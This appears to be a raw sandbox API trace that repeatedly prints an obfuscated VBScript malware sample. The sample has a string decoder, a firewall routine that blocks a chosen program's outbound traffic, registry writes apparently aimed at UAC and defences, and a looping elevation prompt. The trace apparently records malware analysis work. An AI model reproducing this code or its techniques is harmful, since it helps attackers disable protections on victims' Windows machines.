bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.290] wcsncmp (_String1="w(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.290] wcsncmp (_String1="(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.290] wcsncmp (_String1="s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.290] wcsncmp (_String1="1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 